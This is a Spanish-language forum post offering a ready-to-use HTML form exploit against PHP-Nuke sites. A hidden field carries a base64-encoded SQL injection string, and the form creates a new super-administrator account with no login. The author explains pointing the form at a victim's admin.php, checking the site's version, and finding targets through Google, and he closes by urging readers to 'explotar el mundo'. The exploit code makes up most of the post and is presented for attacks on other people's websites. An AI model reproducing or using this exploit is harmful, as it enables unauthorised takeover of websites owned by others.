Autor
PHP-NUKE para el que no sepa es un sistema de creacion de portales baado en PHP y que utiliza bases de dato SQL.
La idea de este exploit es la de crear un administrador sin ninguna informacion de la web.
El codigo esta en html asi que no tienen que andar con el rollo de compilar.
El siguiente es el codiogo:
<form name="mantra" method="POST" action="http://www.victima.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOMBRE:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
Bueno ahora lo que hace falta hacer es cambiar http://www.victima.com/admin.php por la pagina que queremos explotar.
Al ejecutar les aparecera una ventana con este contenido que deveran rellenar:
logrado ! ! !
Piensen que el exploit es bastante viejo por lo que funcionara en versiones inferiores (creo) de la 7.0 (por ahi lei que de la 7.4 sin actualizar).
Para saber la version miren en el codigo fuente de la pagina principal que dira algo como:
<META NAME="GENERATOR" CONTENT="PHP-Nuke 5.5 - http://phpnuke.org">
Bueno ahora a bucar POWERED PHP-NUKE en google y explotar el mundoooooooooooooooo!!!!!!!!!! xxxD
P.D.: Es el primer texto (medianamente) largo que escribo asi que me gustaria saber si les gusto o no.
Saludos
DjMuggs The RiPPeR
--------------------->
En línea
